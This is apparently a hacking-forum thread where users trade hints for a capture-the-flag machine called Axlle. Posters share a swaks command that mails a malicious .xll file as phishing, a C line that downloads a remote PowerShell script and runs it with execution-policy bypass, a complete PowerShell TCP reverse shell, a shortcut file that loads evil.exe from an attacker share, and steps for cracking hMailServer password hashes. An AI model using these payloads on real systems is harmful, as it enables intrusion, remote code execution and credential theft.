[AdenBilal]

any hint for user flag

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[maggi]

Is there any RDP fuckery as matrix user (or any user)?
I thought I saw that in bloodhound

Or is it more 'phising" until root (the guy fishing on the boat was the emblem which explains a lot) ?

[bmoon10]

After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer u have a some config files with password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter for unhash the password for MSSQL database

apparently its a hmailServer SHA256 hash for the email account "accounts@axlle.htb". Unable to crack with the hashcat / crackstation.

hashcat --identify accounts-axlle.htb.hash

The following hash-mode match the structure of your input hash:

      # | Name                                                      | Category
  ======+============================================================+======================================
  1421 | hMailServer                                                | FTP, HTTP, SMTP, LDAP Server

[game95]

After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer u have a some config files with password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter for unhash the password for MSSQL database

How to open hMailServer.sdf after get a password?

[bmoon10]

winpeas with 'dallon.matrix' shell reveals some interesting info.

[anon912039120]

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1.swaks that i've used and worked  - 

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2.powershell execution - made the rev shell work with addition of command in the xll example cpp file

system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

what did you use to make the xll file?

I tried using the HelloWorld and Octoberfest XLL_Phishing github repos to create the xll but I don't ever see any traffic on my http server

I used HelloWorld XLL (applied the necessary changes), modified xlAutoOpen to execute system("powershell -e ...") and that's it

[game95]

anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me

$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share

What is a payload of evil.exe could you share pls?

[a44857437]

Any hint for root? Entered the matrix, got some DB creds...

[bmoon10]

anyone know how to use the hMailServer creds once you get the password?

1. hMailServer administrator encrypted pass is not crackable but the sqlserver pass is.

2. you can download the hMailserver.sdf and use the right tools + password to login into the database

3. dump the SHA256 password hashes of mail account holders from the table

4. try to crack the SHA256 hash and with john / hashcat.

it might be a dead-end nevertheless exploring all the avenue is a good thing.

[Th3B4h0z]

any hint from app-devs to root ?